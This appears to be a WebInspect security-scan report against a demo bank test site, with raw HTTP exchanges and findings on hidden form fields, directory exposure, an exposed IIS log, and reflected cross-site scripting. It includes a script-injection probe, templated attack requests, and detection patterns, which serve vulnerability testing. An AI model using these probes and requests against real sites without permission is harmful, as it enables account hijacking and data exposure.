STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?err=Invalid%20Login%3A <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp?err=Invalid%20Login%3A HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4929
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login:<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Login FormA possible login form was found.GET <var name="path"/>?err=Invalid%20Login%3A <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
type=['"]?password['"]?GET /htbin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:36 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (htbin)<B>Found Directory:</B> /htbin/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert("XSS")</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack>>"><script>alert("XSS")</script></attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /W3SVC6/ex001221.log HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:57 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:15 GMT
ETag: "f0dbe50aadc11:8f6"
Content-Length: 22503
209.153.254.49, -, 1/10/00, 8:32:48, W3SVC6, PRIMUS, 209.153.254.45, 1859, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:33:35, W3SVC6, PRIMUS, 209.153.254.45, 78, 271, 3504, 200, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:33:35, W3SVC6, PRIMUS, 209.153.254.45, 625, 325, 73312, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/10/00, 8:33:35, W3SVC6, PRIMUS, 209.153.254.45, 422, 317, 64536, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.45, -, 1/10/00, 8:52:10, W3SVC6, PRIMUS, 209.153.254.45, 156, 342, 3480, 200, 0, GET, /index.html, -,
209.153.254.45, -, 1/10/00, 8:52:10, W3SVC6, PRIMUS, 209.153.254.45, 454, 263, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.45, -, 1/10/00, 8:52:10, W3SVC6, PRIMUS, 209.153.254.45, 500, 271, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/10/00, 8:54:48, W3SVC6, PRIMUS, 209.153.254.45, 1203, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:54:51, W3SVC6, PRIMUS, 209.153.254.45, 1110, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:56:21, W3SVC6, PRIMUS, 209.153.254.45, 1203, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 8:58:14, W3SVC6, PRIMUS, 209.153.254.45, 110, 321, 5464, 200, 0, GET, /sections.html, -,
209.153.254.49, -, 1/10/00, 8:58:14, W3SVC6, PRIMUS, 209.153.254.45, 141, 343, 1979, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.49, -, 1/10/00, 8:58:14, W3SVC6, PRIMUS, 209.153.254.45, 110, 336, 3052, 200, 0, GET, /BennettArts/back.gif, -,
209.153.254.49, -, 1/10/00, 9:01:05, W3SVC6, PRIMUS, 209.153.254.45, 937, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 9:08:57, W3SVC6, PRIMUS, 209.153.254.45, 2141, 393, 178, 304, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 9:09:41, W3SVC6, PRIMUS, 209.153.254.45, 1141, 394, 178, 304, 0, GET, /index.html, -,
209.153.254.48, -, 1/10/00, 11:00:53, W3SVC6, PRIMUS, 209.153.254.45, 63, 323, 3480, 200, 0, GET, /index.html, -,
209.153.254.48, -, 1/10/00, 11:00:53, W3SVC6, PRIMUS, 209.153.254.45, 297, 382, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.48, -, 1/10/00, 11:00:53, W3SVC6, PRIMUS, 209.153.254.45, 453, 374, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
216.32.64.10, -, 1/10/00, 11:15:40, W3SVC6, PRIMUS, 209.153.254.45, 437, 142, 3480, 200, 0, GET, /index.html, -,
216.32.64.10, -, 1/10/00, 11:21:07, W3SVC6, PRIMUS, 209.153.254.45, 390, 155, 5440, 200, 0, GET, /sections.html, -,
216.32.64.10, -, 1/10/00, 11:21:50, W3SVC6, PRIMUS, 209.153.254.45, 0, 159, 623, 404, 2, GET, /millenniumsurvey/, -,
216.32.64.10, -, 1/10/00, 11:22:01, W3SVC6, PRIMUS, 209.153.254.45, 453, 166, 3559, 200, 0, GET, /TheHipHopZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:22:15, W3SVC6, PRIMUS, 209.153.254.45, 843, 171, 6749, 200, 0, GET, /Michael_Hurst/recordings.html, -,
216.32.64.10, -, 1/10/00, 11:22:29, W3SVC6, PRIMUS, 209.153.254.45, 516, 166, 4398, 200, 0, GET, /TheTechnoZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:22:41, W3SVC6, PRIMUS, 209.153.254.45, 547, 167, 4971, 200, 0, GET, /TheAmbientZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:22:44, W3SVC6, PRIMUS, 209.153.254.45, 672, 169, 4967, 200, 0, GET, /TheClassicalZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:23:44, W3SVC6, PRIMUS, 209.153.254.45, 531, 164, 3973, 200, 0, GET, /TheFolkZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:23:51, W3SVC6, PRIMUS, 209.153.254.45, 0, 175, 623, 404, 3, GET, /TheClassicalZone/Dec30/index.html, -,
216.32.64.10, -, 1/10/00, 11:23:59, W3SVC6, PRIMUS, 209.153.254.45, 2765, 211, 1327976, 200, 64, GET, /Lori_Pappajohn/audio/Lori_Pappajohn-The_Minstrel's_Dream(excerpt).mp3, -,
216.32.64.10, -, 1/10/00, 11:24:06, W3SVC6, PRIMUS, 209.153.254.45, 2688, 212, 1743327, 200, 64, GET, /Lori_Pappajohn/audio/Lori_Pappajohn-First_Snows_of_Winter(excerpt).mp3, -,
216.32.64.10, -, 1/10/00, 11:24:17, W3SVC6, PRIMUS, 209.153.254.45, 265, 166, 2791, 200, 0, GET, /Michael_Hurst/index.html, -,
216.32.64.10, -, 1/10/00, 11:24:24, W3SVC6, PRIMUS, 209.153.254.45, 1203, 162, 22076, 200, 0, GET, /TheMP3Zone-News.html, -,
216.32.64.10, -, 1/10/00, 11:24:34, W3SVC6, PRIMUS, 209.153.254.45, 391, 157, 1100, 200, 0, GET, /Graeme_Bennett/index.html, -,
216.32.64.10, -, 1/10/00, 11:25:00, W3SVC6, PRIMUS, 209.153.254.45, 32, 181, 623, 404, 2, GET, /TheHipHopZone/javascript:history.back(), -,
216.32.64.10, -, 1/10/00, 11:25:15, W3SVC6, PRIMUS, 209.153.254.45, 0, 182, 623, 404, 2, GET, /TheAmbientZone/javascript:history.back(), -,
216.32.64.10, -, 1/10/00, 11:25:22, W3SVC6, PRIMUS, 209.153.254.45, 234, 167, 1029, 200, 0, GET, /Graeme_Bennett/index.html, -,
216.32.64.10, -, 1/10/00, 11:25:47, W3SVC6, PRIMUS, 209.153.254.45, 516, 156, 4468, 200, 0, GET, /TheTechnoZone/index.html, -,
216.32.64.10, -, 1/10/00, 11:25:58, W3SVC6, PRIMUS, 209.153.254.45, 453, 157, 5042, 200, 0, GET, /TheAmbientZone/index.html, -,
209.153.254.48, -, 1/10/00, 13:06:01, W3SVC6, PRIMUS, 209.153.254.45, 63, 323, 3480, 200, 0, GET, /index.html, -,
209.153.254.48, -, 1/10/00, 13:06:01, W3SVC6, PRIMUS, 209.153.254.45, 516, 374, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.48, -, 1/10/00, 13:06:01, W3SVC6, PRIMUS, 209.153.254.45, 641, 382, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.53, -, 1/10/00, 13:07:43, W3SVC6, PRIMUS, 209.153.254.45, 63, 229, 3480, 200, 0, GET, /index.html, -,
209.153.254.53, -, 1/10/00, 13:07:43, W3SVC6, PRIMUS, 209.153.254.45, 1547, 288, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.53, -, 1/10/00, 13:07:46, W3SVC6, PRIMUS, 209.153.254.45, 1813, 280, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/10/00, 13:10:28, W3SVC6, PRIMUS, 209.153.254.45, 406, 314, 3480, 200, 0, GET, /index.html, -,
209.53.10.158, -, 1/10/00, 13:10:28, W3SVC6, PRIMUS, 209.153.254.45, 1813, 300, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.53.10.158, -, 1/10/00, 13:10:28, W3SVC6, PRIMUS, 209.153.254.45, 1516, 292, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.53, -, 1/10/00, 13:10:39, W3SVC6, PRIMUS, 209.153.254.45, 93, 279, 5440, 200, 0, GET, /sections.html, -,
209.153.254.53, -, 1/10/00, 13:10:39, W3SVC6, PRIMUS, 209.153.254.45, 93, 306, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.53, -, 1/10/00, 13:10:39, W3SVC6, PRIMUS, 209.153.254.45, 94, 299, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.153.254.45, -, 1/10/00, 13:20:30, W3SVC6, PRIMUS, 209.153.254.45, 157, 392, 5440, 200, 0, GET, /sections.html, -,
209.153.254.45, -, 1/10/00, 13:20:30, W3SVC6, PRIMUS, 209.153.254.45, 15, 289, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.45, -, 1/10/00, 13:20:30, W3SVC6, PRIMUS, 209.153.254.45, 218, 282, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 219, 373, 5440, 200, 0, GET, /sections.html, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 297, 387, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 62, 400, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.153.254.48, -, 1/10/00, 13:23:54, W3SVC6, PRIMUS, 209.153.254.45, 219, 393, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 30906, 358, 178, 304, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 125, 232, 3480, 200, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 610, 283, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:25, W3SVC6, PRIMUS, 209.153.254.45, 641, 291, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:28, W3SVC6, PRIMUS, 209.153.254.45, 1734, 232, 3480, 200, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:28, W3SVC6, PRIMUS, 209.153.254.45, 110, 283, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:28, W3SVC6, PRIMUS, 209.153.254.45, 2390, 291, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:30, W3SVC6, PRIMUS, 209.153.254.45, 2125, 320, 178, 304, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:38, W3SVC6, PRIMUS, 209.153.254.45, 9375, 378, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:38, W3SVC6, PRIMUS, 209.153.254.45, 7875, 370, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:38, W3SVC6, PRIMUS, 209.153.254.45, 79, 320, 178, 304, 0, GET, /index.html, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 7359, 378, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 94, 282, 5440, 200, 0, GET, /sections.html, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 7500, 370, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 78, 309, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.53.9.226, -, 1/10/00, 13:57:45, W3SVC6, PRIMUS, 209.153.254.45, 281, 302, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.53.9.226, -, 1/10/00, 13:57:48, W3SVC6, PRIMUS, 209.153.254.45, 2859, 302, 22076, 200, 0, GET, /TheMP3Zone-News.html, -,
209.153.254.49, -, 1/10/00, 16:01:36, W3SVC6, PRIMUS, 209.153.254.45, 63, 271, 3504, 200, 0, GET, /index.html, -,
209.153.254.49, -, 1/10/00, 16:01:36, W3SVC6, PRIMUS, 209.153.254.45, 594, 325, 73312, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/10/00, 16:01:36, W3SVC6, PRIMUS, 209.153.254.45, 406, 317, 64536, 200, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/11/00, 0:19:32, W3SVC6, PRIMUS, 209.153.254.45, 0, 324, 623, 404, 2, GET, /musicstore, -,
209.53.10.158, -, 1/11/00, 0:19:36, W3SVC6, PRIMUS, 209.153.254.45, 0, 327, 623, 404, 2, GET, /musicstore, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 125, 402, 178, 304, 0, GET, /index.html, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 1125, 387, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 62, 364, 5440, 200, 0, GET, /sections.html, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 1281, 379, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 63, 318, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.53.10.158, -, 1/11/00, 0:19:40, W3SVC6, PRIMUS, 209.153.254.45, 313, 311, 3028, 200, 0, GET, /BennettArts/back.gif, -,
